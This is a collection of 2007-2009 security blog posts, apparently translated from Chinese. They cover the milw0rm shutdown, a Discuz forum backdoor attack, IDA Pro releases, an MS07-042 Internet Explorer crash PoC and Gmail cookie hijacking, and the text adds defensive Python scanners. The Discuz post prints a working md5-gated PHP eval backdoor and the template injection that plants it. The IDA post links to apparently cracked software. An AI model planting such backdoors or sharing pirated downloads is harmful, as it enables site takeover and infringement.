R.I.P Str0ke is still alive:)
Author: ZhaoHuAn Date: 2009-11-05
Quoted content: "Hi,
I know by now that many of you have seen the story at...
http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html
I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.
Well, good news and bad news here.
Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.
Now the good news. The folks at OffSec, along with David Kennedy and others, are
taking over milw0rm from str0ke. Read the announcement here:
http://www.offensive-security.com/blog/
I had just talked with Muts yesterday about another issue, and he indicated that...
The third wave of the Discuz 3rd Party attack has appeared
Author: ZhaoHuAn Date: 2009-08-20
Not sure which classmate's masterpiece this is again. My initial guess is that customer.discuz.net was hijacked and combined with the custom template variable vulnerability: when an administrator visits the admin backend, a one-line backdoor is generated.
Quoted content
Custom template variable:
Variable : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')EVAL($_POST['A']);//}
Replacement content : aaaaaaaaaa
/forumdata/cache/usergroup_0.php
Program code
<?php (substr(md5($_POST['b']),28)=='7aaa') && eval($_POST['a']);?>
It takes the MD5 of the POST variable b, and if positions 28-31 (the last four characters of the 32-character MD5) are 7aaa, it executes eval($_POST['a']);
This check is pretty sneaky...
I guess a lot of the big sites hacked recently were down to this thing~
If you run a DZ forum, please check the files under /forumdata/cache/ yourself.
Related discussion:
Beware of Third Party Content attacks
[url=http://discuz.net/viewthread.php?tid=1385006&extra=page%3D1&page=1]Discuz...
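The post tells DZ forum owners to check the files under /forumdata/cache/ by hand. As an added example (not code from the original post or from Discuz), here is a small scanner that does that check: it walks a cache directory and flags any .php file that either feeds eval()/assert() straight from a request superglobal or carries the substr(md5(...),28) gate shown in the post. Both indicators are lifted from the quoted backdoor; the function names, the benign sample cache file and the temporary directory layout are constructed for this example.

```python
"""Scan a Discuz! forumdata/cache directory for the one-line backdoor described above.

Added example, not code from the original post or from Discuz. The two indicators
(eval/assert applied to raw request input, and a substr(md5(...),28) gate on a
request parameter) are lifted from the backdoor shown in the post; the function
names, the benign cache file and the temporary directory layout are constructed here.
"""
import os
import re
import tempfile

# Indicator 1: eval() or assert() fed directly from a request superglobal.
EVAL_OF_REQUEST = re.compile(
    r"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)
# Indicator 2: the specific gate from the post, comparing the last 4 hex chars
# of md5(<request parameter>) before executing anything.
MD5_GATE = re.compile(
    r"substr\s*\(\s*md5\s*\(\s*\$_(POST|GET|REQUEST)\[[^\]]*\]\s*\)\s*,\s*28\s*\)", re.I)


def scan_text(text):
    """Return [(line_no, indicator), ...] for every suspicious line in text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if EVAL_OF_REQUEST.search(line):
            findings.append((no, "eval/assert of raw request input"))
        if MD5_GATE.search(line):
            findings.append((no, "md5-suffix gate on request parameter"))
    return findings


def scan_cache_dir(root):
    """Walk root and return {relative path: findings} for every .php file that hits."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read())
            if findings:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return hits


# Constructed sample files: a harmless-looking Discuz cache entry and the backdoored
# usergroup_0.php quoted in the post.
BENIGN_CACHE = (
    "<?php\n"
    "$_DCACHE['usergroups'][0] = array('grouptitle' => 'Guest', 'readaccess' => '1');\n"
    "?>\n")
BACKDOORED_CACHE = (
    "<?php (substr(md5($_POST['b']),28)=='7aaa') && eval($_POST['a']);?>\n")


def build_sample_tree():
    """Create a temporary forumdata/cache tree with one clean and one backdoored file."""
    root = tempfile.mkdtemp(prefix="dz_cache_")
    cache = os.path.join(root, "forumdata", "cache")
    os.makedirs(cache)
    with open(os.path.join(cache, "cache_settings.php"), "w") as fh:
        fh.write(BENIGN_CACHE)
    with open(os.path.join(cache, "usergroup_0.php"), "w") as fh:
        fh.write(BACKDOORED_CACHE)
    return root


if __name__ == "__main__":
    # Point scan_cache_dir() at a real forum root instead of the sample tree to audit it.
    for path, findings in scan_cache_dir(build_sample_tree()).items():
        for no, what in findings:
            print(f"{path}:{no}: {what}")
```

The regexes are case-insensitive on purpose: the template-variable payload quoted in the post is written in upper case (SUBSTR(MD5(...)), EVAL($_POST['A'])) while the generated cache file is lower case, and both must hit. Discuz cache files are generated code, so any eval()/assert() on request input in that directory is worth a look even when the md5 gate is absent.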
milw0rm mirror & program
Author: ZhaoHuAn Date: 2009-07-09
The day before yesterday I heard that milw0rm had shut down, really unfortunate news :(
Today when I went looking for an exploit, I found milw0rm no longer opens. I remembered that inj3ct0r had made a milw0rm mirror earlier, at http://inj3ct0r.com
It seems to be a mirror that can currently be reached from inside China with fairly complete data (if any brothers have a better one, post it quickly, heh).
It's understandable that maintaining a site like milw0rm takes a great deal of time and energy: not only the upkeep of the site's code, database and server, but also the huge number of exploits to test every day...
Anyone interested could also put together a new milw0rm themselves~
The program is at:
http://www.book.amjad.ws/save.php?action=save&id=41
Database config file:
ozellikler.php
DB: milw0rm.sql
I believe milw0rm will carry on; hope str0ke can find a good successor to take it over :)
PS: I've arrived in Shanghai, reporting to the company on the 14th; these past few months have really been busy~
IDA Pro 5.3 feature list
Author: ZhaoHuAn Date: 2008-07-17
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
Sp3
Author: ZhaoHuAn Date: 2008-04-29
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
SP3 English version
MD5:bb25707c919dd835a9d9706b5725af58
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-chs_D7067E86ABD4257454200D0C398D71C4CE6CD33E.exe
SP3 Chinese version
IDA.Pro.Advanced.v5.1.0.899-YAG
Author: ZhaoHuAn Date: 2007-10-10
DataRescue.IDA.Pro.Advanced.v5.1.0.899-YAG: IDA v5.1 has started to be released
DataRescue.IDA.Pro.Advanced.v5.1.Linux-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Linux.rar
DataRescue.IDA.Pro.Advanced.v5.1.Mac.OSX-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Mac.OSX.rar
DataRescue.IDA.Pro.Advanced.v5.1.0.899-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Windows.rar
MS07-042 XMLDOM substringData() PoC
Author: ZhaoHuAn Date: 2007-08-16
Program code
Alla Bezroutchko <alla_at_scanit.be>
Date: Thu, 16 Aug 2007 11:32:10 +0200
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
Installing the patch from MS07-042 fixes it.
Cheers,
Alla Bezroutchko
Scanit - http://www.scanit.be/
// Microsoft also released a patch very quickly.
Black Hat security conference: Gmail gets cracked
Author: ZhaoHuAn Date: 2007-08-05
"I received an email that said: I like sheep. But that email wasn't sent by my friend; it came from a hacker posing as my friend."
At the recently held Black Hat security convention, Errata Security CEO Robert Graham hijacked a Gmail session and read its mail contents, startling everyone present. Going further, he personally demonstrated sending email to the audience through a journalist's Gmail account: the very message expressing fondness for sheep quoted above.
The attack is actually simple. First Graham needs to capture packets, and the Wi-Fi wireless network in use at the conference venue was just right for that. Then Graham used Ferret to sniff all the cookies flying around the venue and copied them into his own browser using a small tool called Hamster.
In fact this attack can intercept almost any cookie-based web application; the webmail services that passed Graham's "test" include Google's Gmail, Microsoft's Hotmail and Yahoo Mail. He stressed that these applications rely on the cookie alone, so he needs no username or password, only the IP address.
ZDNet technical director and editor George Ou volunteered as the test subject: he created a new Gmail account, getmehacked@gmail.com, logged in over the Black Hat conference Wi-Fi and sent mail. While Ou was typing, Graham ran Ferret, sniffed the cookie exchanged between Ou and Google, then clicked on Ou's IP and the Gmail page, and all of Ou's recently sent messages appeared on screen.
Since the attack relies on sniffing traffic, using SSL or another type of encryption (such as a VPN) would block Graham's crack. However, most people using public wireless hotspots...
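The article's point is that these sites authenticated every request with a cookie alone and let that cookie travel over plain HTTP, so anyone on the same Wi-Fi could copy it. On the cookie side, the control that keeps a session cookie off unencrypted connections is the Secure attribute (HttpOnly is the usual companion). As an added example, not from the article or from any of the sites named, here is a small audit over Set-Cookie headers that reports session-looking cookies lacking those attributes. The session-name heuristic and the three sample headers are constructed for this example.

```python
"""Audit Set-Cookie headers for session cookies that would travel in clear text.

Added example, not part of the original post. The post's lesson is that a
cookie-only session sent over unencrypted Wi-Fi can be sniffed and replayed;
the cookie-side control is the Secure attribute (with HttpOnly alongside).
The name heuristic and the sample headers below are constructed.
"""

# Constructed heuristic: substrings that usually mark an authentication cookie.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, {attribute: value-or-True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def looks_like_session(name):
    """True if the cookie name contains one of the session hints."""
    lowered = name.lower()
    return any(hint in lowered for hint in SESSION_NAME_HINTS)


def audit(headers):
    """Return [(cookie name, [problem, ...]), ...] for session-looking cookies only."""
    findings = []
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if not looks_like_session(name):
            continue
        problems = []
        if "secure" not in attrs:
            problems.append("missing Secure: cookie is sent over plain HTTP and can be sniffed on open Wi-Fi")
        if "httponly" not in attrs:
            problems.append("missing HttpOnly: cookie is readable from page scripts")
        if problems:
            findings.append((name, problems))
    return findings


# Constructed sample headers, as a server might emit them.
SAMPLE_HEADERS = [
    "SID=abc123; Path=/; Domain=.example.com",        # session cookie, no flags
    "AUTH_TOKEN=def456; Path=/; Secure; HttpOnly",     # session cookie, properly flagged
    "prefs=lang%3Den; Path=/",                         # not a session cookie
]


if __name__ == "__main__":
    for name, problems in audit(SAMPLE_HEADERS):
        for problem in problems:
            print(f"{name}: {problem}")
```

Secure only helps when the site actually serves its logged-in pages over HTTPS; the attribute tells the browser never to attach the cookie to an http:// request, which is exactly the request Ferret would otherwise see in the clear.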